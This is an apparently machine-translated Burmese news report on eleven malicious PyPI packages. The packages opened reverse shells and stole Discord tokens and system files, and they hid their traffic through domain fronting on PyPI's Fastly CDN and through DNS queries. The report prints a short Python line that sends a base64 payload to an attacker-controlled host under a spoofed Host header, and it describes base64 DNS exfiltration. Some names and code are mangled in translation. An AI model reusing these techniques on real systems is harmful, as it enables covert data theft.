ဆက်သွယ်ရေးလမ်းကြောင်းကိုဖုံးကွယ်ရန် PyPI CDN ကိုအသုံးပြုသည့် PyPI ကတ်တလောက်တွင် အန္တရာယ်ရှိသောစာကြည့်တိုက်များကို ဖော်ထုတ်တွေ့ရှိခဲ့သည်

PyPI (Python Package Index) လမ်းညွှန်တွင်၊ အန္တရာယ်ရှိသောကုဒ်ပါရှိသော ပက်ကေ့ဂျ် ၁၁ ခုကို ဖော်ထုတ်ခဲ့သည်။ ပြဿနာများကို မဖော်ထုတ်မီတွင် ပက်ကေ့ချ်များကို စုစုပေါင်း အကြိမ်ရေ ၃၈ဝဝဝ ခန့် ဒေါင်းလုဒ်လုပ်ခဲ့သည်။ တွေ့ရှိထားသည့် အန္တရာယ်ရှိသော ပက်ကေ့ဂျ်များသည် တိုက်ခိုက်သူများ၏ဆာဗာများနှင့် ဆက်သွယ်ရေးလမ်းကြောင်းများကို ဖုံးကွယ်ရန် ဆန်းပြားသောနည်းလမ်းများကို အသုံးပြုသည့်အတွက် မှတ်သားဖွယ်ကောင်းသည်။

• အရေးကြီးသောပက်ကေ့ခ်ျ (6305 ဒေါင်းလုဒ်များ)၊ အရေးကြီးသော ပက်ကေ့ခ်ျ (12897) - စနစ် (ပြောင်းပြန်ရှဲလ်) သို့ shell ဝင်ရောက်ခွင့်ကို ပံ့ပိုးပေးရန် pypi.python.org နှင့် ချိတ်ဆက်ခြင်း၏ အသွင်အပြင်အောက်တွင် ပြင်ပဆာဗာတစ်ခုနှင့် ချိတ်ဆက်မှုကို တည်ထောင်ခဲ့ပြီး ၎င်းကို ဖုံးကွယ်ရန်အတွက် trevorc2 ပရိုဂရမ်ကို အသုံးပြုခဲ့သည်။ ဆက်သွယ်ရေးလမ်းကြောင်း။
• pptest (10001)၊ ipboards (946) - စနစ်နှင့်ပတ်သက်သော အချက်အလက်များကို ပို့လွှတ်ရန်အတွက် ဆက်သွယ်ရေးလမ်းကြောင်းတစ်ခုအနေဖြင့် DNS ကိုအသုံးပြုခဲ့သည် (ပထမပက်ကတ်တွင် လက်ခံသူအမည်၊ အလုပ်လမ်းညွှန်၊ အတွင်းနှင့် ပြင်ပ IP၊ ဒုတိယတွင် - အသုံးပြုသူအမည်နှင့် လက်ခံသူအမည်) .
• owlmoon (3285)၊ DiscordSafety (557)၊ yiffparty (1859) - စနစ်အတွင်းရှိ Discord ဝန်ဆောင်မှု တိုကင်ကို ဖော်ထုတ်ပြီး ပြင်ပအိမ်ရှင်ထံ ပေးပို့သည်။
• trrfab (287) - သတ်မှတ်ချက်၊ လက်ခံသူအမည်နှင့် /etc/passwd၊ /etc/hosts၊ /home ၏ ပြင်ပအိမ်ရှင်ထံသို့ ပေးပို့သည်။
• 10Cent10 (490) - ပြင်ပ host တစ်ခုနှင့် ပြောင်းပြန် shell ချိတ်ဆက်မှုကို တည်ထောင်ခဲ့သည်။
• yandex-yt (4183) - nda.ya.ru (api.ya.cc) မှတဆင့် ထုတ်ပြန်သည့် နောက်ထပ်လုပ်ဆောင်မှုများအကြောင်း အပိုအချက်အလက်များပါရှိသည့် စာမျက်နှာတစ်ခုသို့ စနစ်အပေးအယူခံရခြင်းအကြောင်း မက်ဆေ့ချ်ကို ပြသထားသည်။

အထူးသတိပြုရန်မှာ အရေးကြီးသောပက်ကေ့ချ်နှင့် အရေးကြီးသော ပက်ကေ့ချ်များတွင် အသုံးပြုသည့် ပြင်ပအိမ်ရှင်များကို ဝင်ရောက်အသုံးပြုသည့်နည်းလမ်းဖြစ်ပြီး ၎င်းတို့၏လုပ်ဆောင်ချက်ကိုဖျောက်ရန် PyPI လမ်းညွှန်တွင်အသုံးပြုသည့် Fastly content delivery network ကို အသုံးပြုထားသည်။ အမှန်တကယ်တွင်၊ တောင်းဆိုချက်များသည် pypi.python.org ဆာဗာသို့ ပေးပို့ခဲ့သည် ( HTTPS တောင်းဆိုမှုအတွင်း SNI တွင် python.org အမည်ကို သတ်မှတ်ခြင်းအပါအဝင်)၊ သို့သော် HTTP “Host” ခေါင်းစီးတွင် တိုက်ခိုက်သူများ ထိန်းချုပ်ထားသော ဆာဗာအမည်ပါရှိသည် (sec. forward.io. global.prod.fastly.net)။ အကြောင်းအရာပေးပို့ခြင်းကွန်ရက်သည် ဒေတာပေးပို့သည့်အခါတွင် TLS ချိတ်ဆက်မှု၏ဘောင်များကို အသုံးပြု၍ တိုက်ခိုက်သည့်ဆာဗာထံ အလားတူတောင်းဆိုမှုတစ်ခုကို ပေးပို့ခဲ့သည်။

PyPI အခြေခံအဆောက်အဦအား ပုံမှန်တောင်းဆိုမှုများကို cache ပြုလုပ်ရန်အတွက် Varnish ပွင့်လင်းမြင်သာသောပရောက်စီကို အသုံးပြုကာ အဆုံးဆာဗာများတွင် HTTPS တောင်းဆိုမှုများကို ပရောက်စီမှတစ်ဆင့် ပေးပို့ရန်မဟုတ်ဘဲ၊ CDN အဆင့်တွင် TLS လက်မှတ်လုပ်ဆောင်ခြင်းကိုလည်း အသုံးပြုပါသည်။ ပစ်မှတ်အိမ်ရှင် မည်သို့ပင်ရှိစေကာမူ HTTP “Host” ခေါင်းစီးကို အသုံးပြု၍ အလိုရှိသော host ကို ဆုံးဖြတ်ပေးသည့် ပရောက်စီသို့ တောင်းဆိုမှုများ ပေးပို့ထားပြီး၊ လက်ခံသူ ဒိုမိန်းအမည်များကို Fastly client အားလုံးအတွက် ပုံမှန်ဖြစ်သည့် CDN load balancer IP လိပ်စာများနှင့် ချိတ်ဆက်ထားသည်။

တိုက်ခိုက်သူများ၏ဆာဗာသည် လူတိုင်းအား အခမဲ့အစီအစဉ်များပေးသည့်အပြင် အမည်မသိမှတ်ပုံတင်ခြင်းကိုပင် ခွင့်ပြုပေးသည့် CDN Fastly ဖြင့်လည်း မှတ်ပုံတင်ပါသည်။ "ပြောင်းပြန်အခွံ" ကိုဖန်တီးသည့်အခါ သားကောင်ထံ တောင်းဆိုမှုများပေးပို့ရန် အစီအစဉ်တစ်ခုကိုလည်း အသုံးပြုသော်လည်း တိုက်ခိုက်သူ၏အိမ်ရှင်ဘက်မှ စတင်လုပ်ဆောင်သည်မှာ မှတ်သားဖွယ်ကောင်းသည်။ ပြင်ပမှ၊ တိုက်ခိုက်သူများ၏ဆာဗာနှင့် အပြန်အလှန်တုံ့ပြန်မှုသည် PyPI TLS အသိအမှတ်ပြုလက်မှတ်ကို အသုံးပြု၍ ကုဒ်ဝှက်ထားသော PyPI လမ်းညွှန်နှင့် တရားဝင်စက်ရှင်တစ်ခုနှင့်တူသည်။ "domain fronting" ဟုလူသိများသော အလားတူနည်းပညာကို ပိတ်ဆို့ခြင်းကိုကျော်ဖြတ်သည့်အခါတွင် host name ကိုဝှက်ထားရန်၊ အချို့သော CDN ကွန်ရက်များတွင် HTTPS ကိုဝင်ရောက်အသုံးပြုရန် ပံ့ပိုးပေးနိုင်စွမ်းကိုအသုံးပြု၍ SNI တွင် စိတ်ကူးယဉ်အိမ်ရှင်တစ်ဦးကို ညွှန်ပြပြီး အမှန်တကယ်ပေးပို့ခြင်း၏အမည်ကို အသုံးပြုထားသည်။ TLS စက်ရှင်အတွင်း HTTP Host ခေါင်းစီးတွင် လက်ခံသူအား တောင်းဆိုထားသည်။

အန္တရာယ်ရှိသော လုပ်ဆောင်ချက်ကို ဖုံးကွယ်ရန်၊ TrevorC2 ပက်ကေ့ဂျ်ကို ဆာဗာနှင့် ပုံမှန်ဝဘ်လမ်းညွှန်ခြင်းဆင်တူသည့် အပြန်အလှန်တုံ့ပြန်မှုပြုလုပ်ရန် ထပ်လောင်းအသုံးပြုခဲ့သည်၊ ဥပမာ၊ ပုံအား ဒေါင်းလုဒ်လုပ်ခြင်းအသွင်ဖြင့် “https://pypi.python.org/images/ တွင် အန္တရာယ်ရှိသော တောင်းဆိုချက်များကို ပေးပို့ခဲ့သည်။ guid=” လမ်းညွှန်ဘောင်အတွင်း သတင်းအချက်အလက်ကုဒ်ဖြင့် url = "https://pypi.python.org" + "/images" + "?" + “guid=” + b64_payload r = request.Request(url, headers = {'Host'- “psec.forward.io.global.prod.fastly.net”})

pptest နှင့် ipboards packages များသည် DNS server သို့ queries များတွင် အသုံးဝင်သော အချက်အလက်များကို ကုဒ်သွင်းခြင်းအပေါ် အခြေခံ၍ ကွန်ရက်လုပ်ဆောင်ချက်ကို ဖုံးကွယ်ရန် ကွဲပြားသောနည်းလမ်းကို အသုံးပြုခဲ့သည်။ Malware သည် “nu4timjagq4fimbuhe.example.com” ကဲ့သို့ DNS တောင်းဆိုမှုများကို လုပ်ဆောင်ခြင်းဖြင့် အချက်အလက်များကို ထိန်းချုပ်ဆာဗာသို့ ပို့လွှတ်သော ဒေတာကို ဒိုမိန်းခွဲအမည်ရှိ base64 ဖော်မတ်ဖြင့် ကုဒ်နံပါတ်ဖြင့် ပေးပို့ပါသည်။ ဥပမာ.com ဒိုမိန်းအတွက် DNS ဆာဗာကို ထိန်းချုပ်ခြင်းဖြင့် တိုက်ခိုက်သူသည် ဤစာများကို လက်ခံရရှိသည် ။

source: opennet.ru